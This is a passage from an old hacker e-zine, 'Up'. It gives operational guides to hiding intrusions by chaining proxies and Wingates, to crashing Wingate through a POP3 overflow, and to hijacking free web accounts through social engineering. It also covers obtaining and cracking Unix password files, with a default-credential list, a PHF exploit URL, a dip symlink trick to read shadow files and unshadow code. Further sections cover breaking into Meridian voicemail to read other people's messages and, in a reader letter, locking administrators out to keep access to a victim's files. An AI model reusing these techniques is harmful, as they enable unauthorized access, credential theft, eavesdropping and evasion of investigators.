privacy whilst on the internet.
*** Introduction To Bouncing
We all desire anonymity to a certain extent. Just exploring the
internet through your regular account is no fun. Internet Protocol is
your address when online. Whenever you send an e-mail, post to a
newsgroup, join an IRC channel even access a website you are being
tracked. Many people are paranoid about cookies. They are stored on
your computer so that websites don't need you to re-enter information.
I have also read many people say it is stupid to delete them. That is
bullshit. I delete cookies, not because I think the US government are
tracking me but because I know that encrypted passwords are often
stored in cookies and if anyone could get hold of these then they might
be able to gain access to my accounts.
Please do not confuse bouncing with spoofing. IP spoofing is the art of
hiding a connection behind packets that seem to come from some
arbitrary source. IP bouncing is the art of re-routing your IP through
somebody else's open connection. We're not going to be hiding behind
packets so there will be logs and records kept on the computer you are
bouncing to. Remember that you aren't truly safe unless you are
spoofing from a guest account on a laptop connected to an out of
country analogue cell phone whilst journeying on a train cross country
at rapid speeds. Anything short of that requires caution and obscurity.
The advantages to bouncing are many. Besides hiding your identity when
hacking (or attempting to hack) it can also be a benefit to the general
public as nuke protection, trojan protection. It is comfortable to
know that you are enclosed, but beware, you aren't untouchable.
*** Proxy Server Bouncing
Ok, we know that proxies keep logs, so hacking from one wouldn't be a
very smart idea. However what if you went through more than one? Go to
telnet. If you are on Unix type telnet and press enter. If you are on
Windows double-click telnet.exe in the Windows installed directory.
Now connect to the proxy e.g. proxy.compuserve.com on the port it is
operating. Most proxy machines operate on port 8080 but not always.
Then connect yourself through telnet to another proxy, then another
and so on. Now when a distraught victim finds someone has been in their
box they'll will contact the sysadmin of the proxy requesting logs.
Then when they figure out that its another proxy they will have to
contact another sysadmin. Now, many sysadmins aren't willing to e-mail
their logs simply because somebody said they were hacked, and many will
have deleted their recent logs by the time they are contacted by the
victim down the line of sysadmins.
Also, use a guest account. If your victim does manages to weave his
way through your multiple connection he will eventually hit a dead end.
So by now you must be convinced that bouncing is a good idea. To use a
proxy through your web browser, in Netscape, click on Options|Network
Preferences then click on the 'Proxies' tab and check the radio button
'Manual Proxy config' and then click the 'view' button. Set it up for
whatever protocols you want, (some proxies might only support HTTP)
probably FTP and HTTP. In Internet Explorer, click View|Options| then
click on the 'Connection' tab and set it up with Netscape.
*** Wingate Bouncing
Wingate is a program for Windows which allows you to connect a whole
network to the internet, bearing all the net traffic on one computer.
In short, it is just another proxy program. However, it is very popular
for its use by hackers. Its flaws allow you to bounce to it from the
standard telnet port 23. This means you can use all the telnet commands
from your connection.
Port 23 is open from the basic system preferences. It can be blocked or
restricted to password access only, but comes open by default. You can
telnet to port 23 on any wingate system. It will then give you the
WinGate> prompt. You can then telnet from there to any other system:
WinGate>proxy.compuserve.com:23
Wingate IPs are very handy to have so I recommend you start scanning
for them right away. What a wingate scanner does is open port 23 on a
computer and scan for the string WinGate> That is not the only thing
wrong with Wingate. If you are an OP in an IRC channel and you suspect
someone is wingating you can crash them off the internet. The bug is
pretty straight forward, telnet to the server at its pop3 port and then
type in:
USER x#99999.....
Type as many nines as possible, this will crash the buffer overflow.
It might be important for you to know that all these tricks only work
if the sysadmin is too lazy to bother fixing them. Here is eight steps
if you are reading this file to help secure your Wingate:
1 - Open GateKeeper and log into Wingate as Administrator.
2 - Double click on Policies, and double click on "Default Policies".
3 - Select the right "Users can access services".
4 - There will be one recipient there - "Everyone". Double click on
this recipient.
5 - Select the Location tab.
6 - Select "Specify locations from where this recipient has rights".
7 - Add 127.0.0.1 and the entries of your main network card.
8 - Hit OK, and remember to save changes.
Now only your LAN users can access any service in Wingate. If some of
your services are using their own rules rather than the global ones,
you can perform this action for each recipient in those service
specific rules.
Well I hope this has been an informative read. If you would like to
e-mail me regarding anything in this file then go ahead. If you are
interested in hacking, phreaking or programming then e-mail me or visit
my website:
cyborg@disinfo.net
http://cyborg.ie.8m.com
:..::..End Of File..::..:
:..::..File 7 Of 11.::..:
:.:.Breaking Accounts.:.:
:..::.:.By HitMan.:.::..:
<*> The main question I would ask about doing this illegal activity is
why? But for the purpose of hacking I will ask no further questions and
presume that you are trying to get revenge on the leader of a child
porn racket or some other perverse organisation. And if it is for the
child porn reason let me know how you get on as I am highly against
any type of child porn and the likes.
With this I don't by any means mean just any old type of account I mean
the free one you get just like a tripod account or xoom. With that in
mind I must tell you that this is a long process in getting access but
if you feel it's worth it then by all means go and do it.
Did you ever notice that when registering with tripod they send you
all heap of shit such as username/password over e-mail. So basically
you have to follow a few but still simple steps in doing this.
First find out as much as you can about the target such as their name
current e-mail address that kind of thing, with that you build up a
profile on the target and use this against them. Now create a free
e-mail address with yahoo (or any one you want) using the targets
details.
For example the targets name is Dohn Divine and lives in 38 Cowper
Downs, Rathmines, Dublin 14, Ireland (Made up name and address). Just
use this as the data you enter when setting up the account.
Now e-mail the web-master in tripod and just simply let them know that
you (John Divine..........) has now changed your e-mail address to
jdivine@yahoo.com (or whatever) and that they should change their
records etc.
New username: johndivine
New e-mail address: jdivine@yahoo.com
Now with this a few months down the road e-mail them saying that you
have forgotten your password. Now they will send you a new password
to the given e-mail address (Which in this case would be the one you
made). This will then in turn give you 100% access to their account.
You can just do it as soon as you change the e-mail address but this
could fail for two reasons A) They will think it's too soon and get
a bit suspect of your activities. B) It will be to soon and the record
will not be updated for a couple of days.
/-----------\ /-----------\ /-----------\
| | | | | |
| Account |-------| Original |------| Provider |
| | | | E-mail | | | |
| | | | | | | |
\-----------/ | \-----------/ | \-----------/
| |
| |
| /-----------\ |
| | | |
|---| New |---|
| E-mail |
| |
\-----------/
If you have any questions on this feel free to mail me about your
problems and I'll be more than happy to awnser your questions.
[-=http://hitman.ie.8m.com=-]
[-=vectra500@geocities.com=-]
:..::..End Of File..::..:
:..::..File 8 Of 11.::..:
:.Cracking Passwd Files.:
:..::...By Cyborg...::..:
<*> Introduction: This file deals with unix passwd files and how to
obtain and crack them. It is not meant as an ultimate guide. It deals
with many aspects of passwd protection.
*** Starting Off
Most FTP servers have the directory /pub which stores all the 'public'
information for you to download. But alongside /pub you will probably
find other directories such as /bin and /etc its the /etc directory
which is important. In this directory there is normally a file called
passwd. This looks something like this:
root:7GHgfHgfhG:1127:20:Superuser
jgibson:7fOsTXF2pA1W2:1128:20:Jim,,,,,,,:/usr/people/jgibson:/bin/csh
tvr:EUyd5XAAtv2dA:1129:20:Tovar:/usr/people/tvr:/bin/csh
mcn:t3e.QVzvUC1T.:1130:20:Greatbear,,,,,,,:/usr/people/mcn:/bin/csh
mouse:EUyd5XAAtv2dA:1131:20:Melissa P.:/usr/people/mouse:/bin/csh
This is where all the user names and passwords are kept. For example,
root is the superuser and the rest are normal users on the site. The
bit after the word root or mcn such as in this example (EUyd5XAAtv2dA)
is the password but it is encrypted with the one-way DES encryption
standard. So you use a password cracker. I recommend John The Ripper
because it is the best. You can easily find that by typing it in at a
search engine. Not that a decoy unix password is sometimes stored in
/home/ftp/etc/passwd to mislead people.
*** Obtaining The Passwd File
First of all, the file is stored in /etc/passwd so that is where you
are going to get it from. To get it you need to be able to login to the
the system. The most common way of doing this is through FTP. The
standard FTP port is 21. So load up your favourite FTP program and
connect to the desired server as anonymous login. Now browse into
/etc/passwd where the file is stored. Take note that sometimes the
passwords are stored in /etc/pwd.db
More often than not the server won't allow anonymous logins or places
restrictions on accessing the /etc/passwd directory. In this case try
the following backdoors:
root | root
sys | sys
sys | bin
sys | system
daemon | daemon
uucp | uucp
tty | tty
test | test
unix | unix
bin | bin
adm | adm
adm | admin
sysman | sysman
sysman | sys
sysadmin | sysadmin
sysadmin | sys
sysadmin | system
sysadmin | admin
sysadmin | adm
who | who
learn | learn
uuhost | uuhost
guest | guest
host | host
nuucp | anon
nuucp | nuucp
rje | rje
sync | sync
admin | admin
games | games
games | player
sysop | sysop
root | sysop
demo | demo
sysbin | sysbin
mountfsys | mountfsys
*** Guide to PHF
The PHF (packet handler function) white pages directory services
program distributed with the NCSA httpd, versions 1.5a and earlier, and
also included in the Apache distribution prior to version 1.0.5, passes
unchecked newline (hex 0a) characters to the Unix shell. The phf phone
book script file in the cgi-bin directory can be exploited to give you
the password (etc/passwd) file in Unix systems.
To use PHF you enter the following command line into any web browser:
http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
This takes you to the /etc/passwd file of the target computer. If you
get a 404 error, file not found then the domain isn't vunerable.
Sometimes you can be logged trying trying PHF queries but in most cases
the domain doesn't report it.
*** Shadowed Passwords
Shadowed password files are where things start to become a little
trickier. This type of passwd file is impossible to crack. The real
encrypted passwords are stored in different files on different systems.
Here is a made-up example of a normal passwd entry:
root:R0rmc6lx78Vwi5I:0:0:root:/root:/bin/bash
Now here is that entry again, only shadowed:
root:x:0:0:root:/root:/bin/bash
You can find the shadowed passwords in these directories according to
their system:
Version Path Token
<*>-----------------------------------------------------------------<*>
AIX 3 /etc/security/passwd !
" " /tcb/auth/files//
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files//
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *
On some Linux Slackwares you can use dip to exploit root, it can also
be used to get the shadow file.
ln -s /etc/shadow /tmp/dummy.dip /sbin/dip -v /tmp/dummy.dip
If dip is vulnerable this will show the shadow file. There is another
alternative, you can unshadow the passwd file with the following famous
C source code:
<*>-------------------------< Unshadow.c >--------------------------<*>
#include <pwd.h>
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}
<*>-------------------------< Unshadow.c >--------------------------<*>
Well I hope this has been an informative read. If you would like to
e-mail me regarding anything in this file then go ahead. If you are
interested in hacking, phreaking or programming then e-mail me or visit
my website:
cyborg@disinfo.net
http://cyborg.ie.8m.com
:..::..End Of File..::..:
:..::..File 9 Of 11.::..:
:...Meridian Mail Tips..:
:..::.:..By CFish.:.::..:
<*> Meridian Mail Tips And Tricks For Quicker Hacking
This is designed for intermediates that haven't really used meridians
before. These apply to meridians that aren't direct except for the
last piece of information marked "For Directs". Please note that most
of this information applies to people living in the UK.z
Names
~~~~~
You can often find where most of the extensions are by using names
directories.
Common numbers to dial for names are: (P) stands for 2 second pause.
09 [P] 11
09 [P] 14
09 [P] 144
09 [P] 158
Then when it says enter the name last name followed by first name enter
something like 56637 meaning "Jones" or just a 3 or 4 random digit
combo of numbers, if it says more than 1 name was found then press #
again, if it then says too many names were found, then refine your
search.
Extensions
~~~~~~~~~~
To get at this you dial:
09 or 0* (There might be another one but I dunno)
Then start guessing 3,4,5 digit extensions, mainly 4 digit but not
always, if it rings then bingo you hit a valid extension, write it
down, others will likely be around that area. Write as many extensions
down as possible about 30 to guarantee getting a box (not necessarily
but likely). Most extensions are normally in common ranges which are
listed in order of commodity below:
8***
3*** (I don't know why but 3231
seems exceedingly common on all types
of Voice Mail Systems)
5***
Getting more than 1 box using compose
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
When you got one box and pass, you log in and press 75 for compose, now
start guessing boxes, if it says mailbox **** or some name then you hit
a valid box, this is like 09 and 0* but you need to log in, it is
quicker though and you can get hundreds of valid box numbers in minutes
inside your box you can use 0* and 09, these are sometimes outdials.
Surveillance
~~~~~~~~~~~~
If you find a system of interest i.e. Nokia Meridian Mail, in which 90%
of passwords are default (box number) and you want to listen to their
messages esp new ones without it saying "Read" when they check their
box which would make them very suspicious you can listen to their
messages another way, you could of course read then delete but that
causes suspicion too. How to be subtle:
1. Get yourself a box that hasn't been checked for months
2. Change the password (84)
3. Now 81 to log in
4. Go through people's mailboxes and forward all mail to your box
number (73) e.g.
Log in
It says you have 2 new msgs
Now type 73
Type your box number then ##
Press 5
Say What box number the msgs you nicked are from, then the message
number.
Press #
Press 79
**Now for message 2**
Press 6 then repeat
5. Logout of other box
6. Log in to your own box
7. You have their messages!!
**To check that it works press 81 then log in to the box you nicked the
msgs from and it will say you have 2 new messages still!
Difficulty logging in??
~~~~~~~~~~~~~~~~~~~~~~~
If you have hit a meridian but you cant log in, then you can probably
log in using the following ways:
1. As soon as you dialed the number press 09 (It might slam you to the
log in prompt)
2. Call any extension then press ##81.
3. Press ##81.
4. Find the extension that takes you the log in bit (e.g. in the Nokia
one it was 5555).
Likely ones are 1111, 2222, 3333, 4444, 5555, 6666, 7777, 8888, 9999,
0000, 1000, 2000, 3000,
4000, 5000, 6000, 7000, 8000, 9000 or things like 5005 or 6005 and
stuff, if necessary scan 999 numbers until you find it.
5. Hand scan the number around the meridian you have got to see if
there is a direct.
(Scan 50-100 either way)
For Directs
~~~~~~~~~~~
When you call up a direct e.g. 0800-899-050 it can be just slightly
pissing off when you don't know whether the boxes are 3, 4, 5 digits
long or whether they start with 5 or 8 or 3? What you can do is guess
at a box and try to log in 3 times with a shit password. It may then
suspend the account temporarily (48hrs approx). Try this with box 0593
or 0594 (My old boxes) and on the fourth attempt it will boot you from
the system automatically in 1 go, this will tell you if you have a
valid box.
CFish
http://ukpk.8m.com
cfish999@hotmail.com
:..::..End Of File..::..:
:..::.File 10 Of 11.::..:
:.:..Letters\Feedback.:.:
:..::...By Readers..::..:
<*> This is the part of the e-zine where we respond to e-mails and
questions and stuff. This section is meant to add a personal touch to
the e-zine. The original mail headers have been left in, as we aren't
going to protect people who send us lame messages. Keep those
intelligent e-mails flowing in. Everybody likes a bit of encouragement.
The e-mails are arranged in the order of the date they were received.
:..::.Coincidence?..::..:
From: Athanasios Oikonomou <thanos@clara.co.uk>
To: cyborg@disinfo.net
Subject: OSA
i read your article in one of the e-zines i downloaded.
The desktop surveillance program u wrote about, that appears as OSA
seems to be installed by Microsoft Office.
if it is a logger, could u tell me where the log file is , so that i
can see it, or is the name just a coincidence?
Thanks for your time
Thanos
<*> <*> <*> <*> <*> <*>
The reason Desktop Surveillance appears on the Task List as OSA is done
on purpose so that people will confuse it with the Office Setup
Application, a small program that is used in setting up MS Office. By
doing this there would be less chance of someone interuptting it by
closing it on the task list.
:..::..Subscription.::..:
From: Daniela <danielas@amis.net>
To: under_p@yahoo.com
Subject: subscribe
Hello,
is there any way to subscribe to your e-zine, because I can't DWL it
from
your site without user name and password.
Have a nice day,
Daniela
<*> <*> <*> <*> <*> <*>
The website is not passworded. It must just be something running on
your box that is stopping you. You probably saw the paragraph in the
Introduction about our new subscription list. Alternatively you could
try downloading from one of the websites in our distributor list.
:.::.Have Some Files.::.:
From: ZxZZT0PZxZ@aol.com
To: under_p@yahoo.com
Subject: LeechFTP
I thought you might like to include this with your d/l's.
It's a nice FTP prog. There is a detailed help file included.
Upon unzipping it will self install to your program files unless you
specify
otherwise. I have scanned each file with Norton 5 and found it to be
virus free.
T0p
Attachment Content-Type:
application/zip; name=FTP.ZIP
Content-Disposition: inline;
Content-Transfer-Encoding: base64
<*> <*> <*> <*> <*> <*>
Thanks for the gesture but zipped copies of issues are the only
downloads on the site. You should build your own website. I'd help but
I'm too busy and all. You could then upload this magazine and become a
distributor for us.
:.:..Permanent Access.:.:
From: "Squish" <squish.nation@virgin.net>
To: <under_p@yahoo.com>
Subject: Perminent Access
No, major hacking trick here. Most hackers have a password cracker or
can
gain access to systems easily enough, but if the victim changes their
password frequently, what can you do instead of re-discovering it all
the time?
If for instance your school network is like mine Using a login prompt
before
opening your desktop it's quite easy.
Logon as your victim with their password.
Load up 'My Computer' and then enter Server13.
Open the 'Users' folder.
Click on 'All Users'
Right click on their account name.
Go to 'Properties'
Click on 'Security'
Click on 'Add'
Click 'Show users'
Click on your own account name.
Select 'Full Control' from the scroll bar below.
Click on 'Add'
That's it. You can access that users files from your own desktop no
matter
what. I recommend however, that you delete the administrators access to
their files otherwise he'll cancel your access and we can't have that.
After
all. Out smarting other people is really what hacking is all about.
Catch ya' later
Skwish1404
E-mail Squish.Nation@Virgin.Net
Website http://Squish.Freeservers.Com (none hacker site)
<*> <*> <*> <*> <*> <*>
We're always happy to recieve snippets of useful information. If you
could think of more tips and tricks like that then maybe you'd have
enough for a file. In which case get back to us and we'd publish it.
:.:.::.EUA Monthly.::.:.:
From: "jastel marrell" <archive_@hotmail.com>
To: under_p@yahoo.com
Subject: zine
greets, I am archive. I am in the process of currently d/l'ing your
zine. Currently I publish the EUA monthly, a zine on the similar topic
of h/p. If you want to grab a copy of our zine you can get it off of
our site at www.freespeech.org/eua --> follow the links to the zine. We
do our pub in pdf format. various writters provide articles to us as
well as information from the EUA's own information networks around the
world. You can respond here for further information or contact me on
irc.xnet.org in #eua.
l8r
archive
Get Your Private, Free Email at http://www.hotmail.com
<*> <*> <*> <*> <*> <*>
After reading EUA and dropping into #eua I came to the conclusion that
archive and his group are very intelligible people. EUA monthly will be
reviewed in the next issue of Up so look out for that.
:.::.Zed's Dead Baby.::.:
From: -= ZED =- <macsrule88@hotmail.com>
To: cyborg@disinfo.net
Subject:
Cyborg, I read an artical you wrote for a zine called up. It was about
pirate radio. If you could explain to me in more detail how to actually
broadcast the radiostation(hook up the radio to an aerial.
Thanks
z
Get Your Private, Free Email at http://www.hotmail.com
<*> <*> <*> <*> <*> <*>
Sorry but the Pirate Radio Series is only meant as a general guide.
I've since been asked specific questions by many people but I don't
have the time to answer them in detail. The information is available to
anyone who can use a search engine. All you need is time and patience.
:..::..End Of File..::..:
:..::.File 11 Of 11.::..:
:.::.:..Disclaimer.:.::.:
:.::.:.By Up Staff.:.::.:
<*> Use this information at your own risk. Staff or contributors to Up,
nor the persons providing this e-zine, will NOT assume ANY
responsibility for the use, misuse, or abuse, of the information
provided herein. The previous information is provided for
educational purposes ONLY. The information is NOT to be used for
illegal purposes.
By reading this e-zine you ARE AGREEING to the following terms: I
understand that using this information is illegal. I agree to, and
understand that I am responsible for my own actions. If I get into
trouble using this information for the wrong reasons, I promise not to
place the blame on Up staff, contributors, or anyone that provided this
e-zine. I understand that this information is for educational purposes
only. Thanks for reading.
________ __ __ ______ ______ ___ __ ____
|__ __| | | | | | ___| | ___| | \ | | | _ \
| | | |_| | | |__ | |__ | \ | | | | | \
| | | _ | | __| | __| | |\ \| | | | | |
| | | | | | | |___ | |___ | | \ | | |_| /
|__| |__| |__| |______| |______| |__| \___| |____/
:..::..End Of File..::..:
